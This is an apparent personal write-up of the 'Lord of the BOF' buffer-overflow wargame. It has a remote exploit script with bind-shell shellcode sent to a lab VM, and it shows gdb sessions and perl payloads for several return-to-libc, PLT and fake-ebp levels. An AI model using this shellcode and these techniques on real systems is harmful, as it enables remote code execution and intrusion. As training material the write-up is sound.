EverTokki

[What is Lord of the BOF?]

From a relatively easy environment, Redhat 6.2 to the ultimate Fedora 14 -

You'll have to go through numerous levels and show off your BOF skills.

Solve the highest level and shoot me an email at chanbin.lee123@gmail.com with a writeup of the death_knight challenge - I'll send you the Fedora image file.

[How to]

Lord of the BOF is given as a vmware image so that you'll have your own environment to connect into and play.

[Download]

1. Download the following vmware image and boot up!

http://hackerschool.org/TheLordofBOF/TheLordOfTheBOF_redhat_bootable.zip

2. Login with credentials: gate/gate

3. Set up your network settings through netconfig (There's a setuid set on the system)

4. Check your ip. (/sbin/ifconfig)

5. Use something like putty or xshell to connect(telnet) to the image and start hacking. 

[Basic Rules]

1. No single boot

2. No root exploit

3. NOT allowed to use LD_PRELOAD on the /bin/my-pass command

[How to check your next level's password]

/bin/my-pass

[List of Levels]

LEVEL1 (gate -> gremlin) :  simple bof

LEVEL2 (gremlin -> cobolt) : small buffer

LEVEL3 (cobolt -> goblin) : small buffer + stdin

LEVEL4 (goblin -> orc) : egghunter

LEVEL5 (orc -> wolfman) : egghunter + bufferhunter

LEVEL6 (wolfman -> darkelf) : check length of argv[1] + egghunter + bufferhunter

LEVEL7 (darkelf -> orge) : check argv[0]

LEVEL8 (orge -> troll) : check argc

LEVEL9 (troll -> vampire) : check 0xbfff

LEVEL10 (vampire -> skeleton) : argv hunter

LEVEL11 (skeleton -> golem) : stack destroyer

LEVEL12 (golem -> darkknight) : sfp 

LEVEL13 (darkknight -> bugbear) : RTL1

LEVEL14 (bugbear -> giant) : RTL2, only execve

LEVEL15 (giant -> assassin) : no stack, no RTL

LEVEL16 (assassin -> zombie_assassin) : fake ebp

LEVEL17 (zombie_assassin -> succubus) : function calls

LEVEL18 (succubus -> nightmare) : plt

LEVEL19 (nightmare -> xavis) : fgets + destroyers

LEVEL20 (xavis -> death_knight) : remote BOF 

[xavius@localhost xavius]$ cat death_knight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark knight

        - remote BOF

*/

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <dumpcode.h>

main()

{

        char buffer[40];

        int server_fd, client_fd;

        struct sockaddr_in server_addr;

        struct sockaddr_in client_addr;

        int sin_size;

        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

                perror("socket");

                exit(1);

        }

        server_addr.sin_family = AF_INET;

        server_addr.sin_port = htons(6666);

        server_addr.sin_addr.s_addr = INADDR_ANY;

        bzero(&(server_addr.sin_zero), 8);

        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

                perror("bind");

                exit(1);

        }

        if(listen(server_fd, 10) == -1){

                perror("listen");

                exit(1);

        }

        while(1) {

                sin_size = sizeof(struct sockaddr_in);

                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

                        perror("accept");

                        continue;

                }

                if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }

                close(client_fd);

                while(waitpid(-1,NULL,WNOHANG) > 0);

        }

        close(server_fd);

}

 if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }

#!usr/bin/python

from socket import *

import struct, sys

#s = socket(AF_INET, SOCK_STREAM)

payload='\x90'*44 #space

#96 bytes of shellcode

shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)

#payload= nop 44 ret_addr 4 nop 110 shellcode 96

#s.connect(("192.168.10.129",6666))

print "Connecting.."

for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode

        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)

s.close()

Administratorui-MacBook-Pro-2:~ EverTokki$ vi exploit_lob.py 

#!usr/bin/python

from socket import *

import struct, sys

import os

#s = socket(AF_INET, SOCK_STREAM)

payload='\x90'*44 #space

#96 bytes of shellcode

shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"

p = lambda x : struct.pack("<I", x)

#payload= nop 44 ret_addr 4 nop 112 shellcode 96

#s.connect(("192.168.10.129",6666))

print "Connecting.."

for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode

        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)

        os.system("telnet 192.168.10.129 31337")

#s.close()

#close connection

Administratorui-MacBook-Pro-2:~ EverTokki$ python exploit_lob.py 

Connecting..

Death Knight : Not even death can save you from me!

You : 

Trying 192.168.10.129...

Connected to 192.168.10.129.

Escape character is '^]'.

ls

: command not found

ls;

bin

boot

dev

etc

home

lib

lost+found

mnt

opt

proc

root

sbin

tmp

usr

var

my-pass;

euid = 520

login: death_knight

Password:

[death_knight@localhost death_knight]$ ls

dropped_item.txt

[death_knight@localhost death_knight]$ cat dropped_item.txt

 You're so great! This is a token to the next gate.

                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,'

                   `'

[death_knight@localhost death_knight]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath

¸ù¿@P1P¸@PP@

[nightmare@localhost nightmare]$

[succubus@localhost succubus]$ ls

nightmare  nightmare.c

[succubus@localhost succubus]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>

main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        // check address

        addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }//버퍼 후 ret가 strcpy여야 합니다 위에 주석의 힌트로 봐선 plt주소값을 사용하란뜻일듯여

        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // dangerous waterfall

        memset(buffer+40+8, 'A', 4);

}

[succubus@localhost succubus]$ cp nightmare fightmare

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare

Breakpoint 1, 0x80486ba in main ()

(gdb) p strcpy

$1 = {char *(char *, char *)} 0x400767b0 <strcpy>

(gdb) disas main

Dump of assembler code for function main:

0x80486b4 <main>:       push   %ebp

0x80486b5 <main+1>:     mov    %esp,%ebp

0x80486b7 <main+3>:     sub    $0x2c,%esp

0x80486ba <main+6>:     cmpl   $0x1,0x8(%ebp)

0x80486be <main+10>:    jg     0x80486d7 <main+35>

0x80486c0 <main+12>:    push   $0x80487db

0x80486c5 <main+17>:    call   0x80483e0 <printf>

0x80486ca <main+22>:    add    $0x4,%esp

0x80486cd <main+25>:    push   $0x0

0x80486cf <main+27>:    call   0x80483f0 <exit>

0x80486d4 <main+32>:    add    $0x4,%esp

0x80486d7 <main+35>:    movl   $0x8048410,0xffffffd4(%ebp)

0x80486de <main+42>:    push   $0x4

0x80486e0 <main+44>:    lea    0xffffffd4(%ebp),%eax

0x80486e3 <main+47>:    push   %eax

0x80486e4 <main+48>:    mov    0xc(%ebp),%eax

0x80486e7 <main+51>:    add    $0x4,%eax

0x80486ea <main+54>:    mov    (%eax),%edx

0x80486ec <main+56>:    add    $0x2c,%edx

0x80486ef <main+59>:    push   %edx

0x80486f0 <main+60>:    call   0x80483c0 <memcmp>

0x80486f5 <main+65>:    add    $0xc,%esp

0x80486f8 <main+68>:    mov    %eax,%eax

0x80486fa <main+70>:    test   %eax,%eax

0x80486fc <main+72>:    je     0x8048715 <main+97>

0x80486fe <main+74>:    push   $0x8048800

0x8048703 <main+79>:    call   0x80483e0 <printf>

0x8048708 <main+84>:    add    $0x4,%esp

0x804870b <main+87>:    push   $0x0

0x804870d <main+89>:    call   0x80483f0 <exit>

0x8048712 <main+94>:    add    $0x4,%esp

0x8048715 <main+97>:    mov    0xc(%ebp),%eax

0x8048718 <main+100>:   add    $0x4,%eax

0x804871b <main+103>:   mov    (%eax),%edx

0x804871d <main+105>:   push   %edx

0x804871e <main+106>:   lea    0xffffffd8(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x8048721 <main+109>:   push   %eax

0x8048722 <main+110>:   call   0x8048410 <strcpy> //걍 @plt안붙어있지만 이거인 쁼이 남여

0x8048727 <main+115>:   add    $0x8,%esp

0x804872a <main+118>:   lea    0xffffffd8(%ebp),%eax

0x804872d <main+121>:   push   %eax

0x804872e <main+122>:   push   $0x8048825

0x8048733 <main+127>:   call   0x80483e0 <printf>

0x8048738 <main+132>:   add    $0x8,%esp

0x804873b <main+135>:   push   $0x4

0x804873d <main+137>:   push   $0x41

0x804873f <main+139>:   lea    0xffffffd8(%ebp),%eax

0x8048742 <main+142>:   lea    0x30(%eax),%edx

0x8048745 <main+145>:   push   %edx

0x8048746 <main+146>:   call   0x8048400 <memset>

0x804874b <main+151>:   add    $0xc,%esp

0x804874e <main+154>:   leave

0x804874f <main+155>:   ret

End of assembler dump.

(gdb) q

The program is running.  Exit anyway? (y or n) y

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`

„//시도해보니 됨. 올ㅋ

/*여기서 고민을 했는데 위의 프로그램은 strcpy실행 후 ret주소가 들어갈 자리를 A로 채워버립니다. 근데 왜 하필 strcpy일까염 쓰라고 그런거겠죠? 인자 리밋도 안하니 결국엔 strcpy를 사용해 ret가 들어갈 곳에 주소를 넣는거라고 생ㅇ각을 하게 됬습니다. 그래서 처음엔 strcpy인자두개 뒤에 시스템 주소와 /bin/sh주소 넣으려고 했는데 안되디다. 그래서 걍 앞에따가 넣었어요.*/

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare

Breakpoint 1, 0x80486ba in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

/*중간에 뭔 뻘짓을 너무많이해놔서 안가리고 걍 다 지웠습니다....*/

[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`

bash2: export: command not found

[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`

[succubus@localhost succubus]$ ls

core  fightmare  nightmare  nightmare.c

[succubus@localhost succubus]$ vi foo.c

[succubus@localhost succubus]$ gcc foo.c -o foo

foo.c: In function `main':

foo.c:5: warning: assignment makes pointer from integer without a cast

[succubus@localhost succubus]$ ./foo BINSH

0xbffffc7c

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf"  '`

AAAAúú ¿úú ¿@BBBB|ü ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp-80

0xbffffa74:     0xbffffb04      0xbffffab8      0x0804874b      0xbffffac0

0xbffffa84:     0x00000041      0x00000004      0x08048410      0x90909090

0xbffffa94:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab4:     0x90909090      0x4000ae60      0x90909090      0x41414141

0xbffffac4:     0xbffffad0      0xbffffadc      0x40058ae0      0x08048441

0xbffffad4:     0x080486b4      0x00000002      0x08048441      0x080486b4

0xbffffae4:     0x00000002      0xbffffb04      0x08048350      0x0804877c

0xbffffaf4:     0x4000ae60      0xbffffafc      0x40013e90      0x00000002

0xbffffb04:     0xbffffc02      0xbffffc0e      0x00000000      0xbffffc57

(gdb) x/wx 0xbffffa90

0xbffffa90:     0x90909090

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿˜ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿˜ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x41410004 in ?? () //잘 안바뀜

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿¬ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x90909090 in ?? ()

(gdb) x/40wx 0xbffffaac

0xbffffaac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffabc:     0x90909090      0x90909090      0x90909090      0x4000ae60

0xbffffacc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffadc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaec:     0x0800ae60      0x080486b4      0x00000002      0xbffffb14

0xbffffafc:     0x08048350      0x0804877c      0x4000ae60      0xbffffb0c

0xbffffb0c:     0x40013e90      0x00000002      0xbffffc0e      0xbffffc1a

0xbffffb1c:     0x00000000      0xbffffc57      0xbffffc6a      0xbffffc78

0xbffffb2c:     0xbffffc90      0xbffffcaf      0xbffffcd1      0xbffffcdf

0xbffffb3c:     0xbffffea2      0xbffffec1      0xbffffedf      0xbffffef4

(gdb) x/40wx 0xbffffaa8

0xbffffaa8:     0xbffffc7c      0x90909090      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x4000ae60      0x90909090      0x90909090      0x90909090

0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae8:     0x90909090      0x0800ae60      0x080486b4      0x00000002

0xbffffaf8:     0xbffffb14      0x08048350      0x0804877c      0x4000ae60

0xbffffb08:     0xbffffb0c      0x40013e90      0x00000002      0xbffffc0e

0xbffffb18:     0xbffffc1a      0x00000000      0xbffffc57      0xbffffc6a

0xbffffb28:     0xbffffc78      0xbffffc90      0xbffffcaf      0xbffffcd1

0xbffffb38:     0xbffffcdf      0xbffffea2      0xbffffec1      0xbffffedf

(gdb) x/40wx 0xbffffaa0

0xbffffaa0:     0x40058ae0      0x42424242      0xbffffc7c      0x90909090

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x4000ae60      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x90909090      0x90909090      0x90909090      0x0800ae60

0xbffffaf0:     0x080486b4      0x00000002      0xbffffb14      0x08048350

0xbffffb00:     0x0804877c      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc0e      0xbffffc1a      0x00000000

0xbffffb20:     0xbffffc57      0xbffffc6a      0xbffffc78      0xbffffc90

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿ ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()/*뭐가 잘 안됨. 근데 걍 삘이 아 시스템 인자전달이 잘못되서 저게....라는 느낌이었슴다*/

(gdb) q

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) x/s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1" /*foo.c너는 대체 나에게 무슨 주소를 준것이냐..*/

(gdb) x/5s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

0xbffffcdf:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

(gdb) x/5s 0xbffffc70

0xbffffc70:      "/bin/sh"

0xbffffc78:      "REMOTEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ exit

exit

Segmentation fault (core dumped)

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ my-pass

euid = 518

login: zombie_assassin

Password:

Last login: Fri May  2 14:40:51 from 192.168.10.1

ls

[zombie_assassin@localhost zombie_assassin]$ ls

foo  foo.c  ssssssss  succubus  succubus.c

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - succubus

        - calling functions continuously

*/

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

// the inspector

int check = 0;

void MO(char *cmd)

{

        if(check != 4)

                exit(0);

        printf("welcome to the MO!\n");

        // olleh!

        system(cmd);

}

void YUT(void)

{

        if(check != 3)

                exit(0);

        printf("welcome to the YUT!\n");

        check = 4;

}

void GUL(void)

{

        if(check != 2)

                exit(0);

        printf("welcome to the GUL!\n");

        check = 3;

}

void GYE(void)

{

        if(check != 1)

                exit(0);

        printf("welcome to the GYE!\n");

        check = 2;

}

void DO(void)

{

        printf("welcome to the DO!\n");

        check = 1;

}

main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        // you cannot use library

        if(strchr(argv[1], '\x40')){

                printf("You cannot use library\n");

                exit(0);

        }

        // check address

        addr = (char *)&DO;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with DO\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

        // stack destroyer

        // 100 : extra space for copied argv[1]

        memset(buffer, 0, 44);

        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser

        // 40 : extra space for memset function

        memset(buffer-3000, 0, 3000-40);

}

/*코드를 정리해주자면 버퍼+148만큼을 남겨두고 싹다 지워버립니다. 그리고 공격자는 도->개->걸->윷->모 순서로 함수를 호출해야 모가 마지막에 자신이 넘겨받은 인자를 시스템 함수로 호출해줍니다. 라이브러리의 함수는 사용할 수 없습니다. 그리고 44바이트를 채워야한다는걸 처음에 깜박했는데 44바이트+코드~~~입니다ㅋ*/

[zombie_assassin@localhost zombie_assassin]$ gdb -q ssssssss

(gdb) b main

Breakpoint 1 at 0x804880e

(gdb) r

Starting program: /home/zombie_assassin/ssssssss

Breakpoint 1, 0x804880e in main ()

(gdb) p DO

$1 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) p GYE

$2 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) p GUL

$3 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) p YUT

$4 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) p MO

$5 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "BBBB", "CCCC"'`

¼Œ\$AAAABBBBCCCC

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

Segmentation fault (core dumped)

/*솔직히 여기서 정신못차림. 주소많아지니까 어우..*/

[zombie_assassin@localhost zombie_assassin]$ gdb -q -c core

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp

0xbffffaa4:     0x42424242      0x43434343      0x08048400      0x08048808

0xbffffab4:     0x00000002      0xbffffad4      0x0804839c      0x0804894c

0xbffffac4:     0x4000ae60      0xbffffacc      0x40013e90      0x00000002

0xbffffad4:     0xbffffbd0      0xbffffbdb      0x00000000      0xbffffc28

0xbffffae4:     0xbffffc42      0xbffffc50      0xbffffc68      0xbffffc87

0xbffffaf4:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb04:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb14:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb24:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/wx 0xbffffaa8

0xbffffaa8:     0x43434343

(gdb) q

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ exit

exit

Segmentation fault (core dumped)

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼Œ\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ my-pass

euid = 517

[assassin@localhost assassin]$ ls

zombie_assassin  zombie_assassin.c

[assassin@localhost assassin]$ cat zombie_assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - zombie_assassin

        - FEBP

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

        char buffer[40];

        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }

        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }

        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }

        // strncpy instead of strcpy!

        strncpy(buffer, argv[1], 48);

        printf("%s\n", buffer);

}

[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print  "\x90"x48'`



Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) x/40wx $esp-40

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090 //훼이크(?)

0xbffffad8:     0x90909090      0x90909090      0x00000002      0xbffffb24

0xbffffae8:     0xbffffb30      0x40013868      0x00000002      0x08048390

0xbffffaf8:     0x00000000      0x080483b1      0x08048440      0x00000002

0xbffffb08:     0xbffffb24      0x080482e4      0x0804851c      0x4000ae60

0xbffffb18:     0xbffffb1c      0x40013e90      0x00000002      0xbffffc16

0xbffffb28:     0xbffffc28      0x00000000      0xbffffc59      0xbffffc6c

0xbffffb38:     0xbffffc84      0xbffffca3      0xbffffcc5      0xbffffcd3

0xbffffb48:     0xbffffe96      0xbffffeb5      0xbffffed3      0xbffffee8

(gdb) x/40wx $esp-80

0xbffffa90:     0x40106980      0x0804857e      0xbffffab0      0x401081ec

0xbffffaa0:     0xbffffad8      0x080484dc      0x0804857e      0xbffffab0

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x00000002      0xbffffb24      0xbffffb30      0x40013868

0xbffffaf0:     0x00000002      0x08048390      0x00000000      0x080483b1

0xbffffb00:     0x08048440      0x00000002      0xbffffb24      0x080482e4

0xbffffb10:     0x0804851c      0x4000ae60      0xbffffb1c      0x40013e90

0xbffffb20:     0x00000002      0xbffffc16      0xbffffc28      0x00000000

(gdb) q

[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]

bash2: buffer[system: command not found

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

[assassin@localhost assassin]$ clear

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048446

(gdb) r

Starting program: /home/assassin/newbie_assassin

Breakpoint 1, 0x8048446 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>:       push   %ebp

0x8048441 <main+1>:     mov    %esp,%ebp

0x8048443 <main+3>:     sub    $0x28,%esp

0x8048446 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804844a <main+10>:    jg     0x8048463 <main+35>

0x804844c <main+12>:    push   $0x8048540

0x8048451 <main+17>:    call   0x8048354 <printf>

0x8048456 <main+22>:    add    $0x4,%esp

0x8048459 <main+25>:    push   $0x0

0x804845b <main+27>:    call   0x8048364 <exit>

0x8048460 <main+32>:    add    $0x4,%esp

0x8048463 <main+35>:    mov    0xc(%ebp),%eax

0x8048466 <main+38>:    add    $0x4,%eax

